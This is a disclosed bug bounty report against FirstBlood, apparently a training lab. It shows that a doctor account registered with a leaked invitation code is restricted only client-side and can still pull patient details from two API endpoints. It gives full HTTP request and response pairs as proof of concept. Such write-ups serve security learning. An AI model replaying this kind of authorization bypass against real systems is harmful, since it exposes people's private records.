FirstBlood-#226 — Recently registered doctor account can still query /drpanel/drapi/qp.php & /drpanel/drapi/query.php
This issue was discovered on FirstBlood v1
On 2021-05-13, 0xconft Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hi there,
I found doctor registration invitation code posted on reddit "F16CA47250E445888824A9E63AE445CE" (https://webcache.googleusercontent.com/search?q=cache:fTlNOjiZGM4J:https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/+&cd=1&hl=id&ct=clnk&gl=id) and i can use it for register doctor account
i notice on recently registered doctor account there's filter that disallow it to view patient information. but it's only happens on client side. These account can still query the qp.php & query.php endpoint with their drps cookie
PoC. Cookie drps=14cdcff76e1ed0f28938d98d2 is the cookie of recently registered doctor account
Request
GET /drpanel/index.php HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: drps=14cdcff76e1ed0f28938d98d2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:37:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10463
-snip-
<div class="alert alert-danger" role="alert"> <strong>Warning:</strong> As your account has been recently registered you will not be able to view patient information yet. </div>
-snip-
PoC of qp.php
Request
POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
Origin: http://firstbloodhackers.com:49648
Connection: close
Referer: http://firstbloodhackers.com:49648/drpanel/index.php
Cookie: drps=14cdcff76e1ed0f28938d98d2
name=sea
Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:39:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228
Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>
PoC of query.php
Request
GET /drpanel/drapi/query.php?aptid=56910219 HTTP/1.1
Host: firstbloodhackers.com:49648
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49648/drpanel/index.php
Cookie: drps=14cdcff76e1ed0f28938d98d2
Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:39:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 261
For safeguarding reasons please do not leave this alert on your screen when unattended! Use information below to verify patients over the phone.
Name: John Smith
Address: 1 Quay Point, Station Road, Woodbridge, IP12 4AL
Telephone: 0113 271 2111
DOB: 09/09/1990
Best Regards,
0xconft
P1 CRITICAL
Endpoint: /drpanel/drapi/qp.php & /drpanel/drapi/query.php
Parameter: cookie
Payload: drps cookie of recently registered doctor account
FirstBlood ID: 11
Vulnerability Type: Application/Business Logic
Administrator endpoints can be accessed by non privileged doctor accounts which reveals sensitive patient information.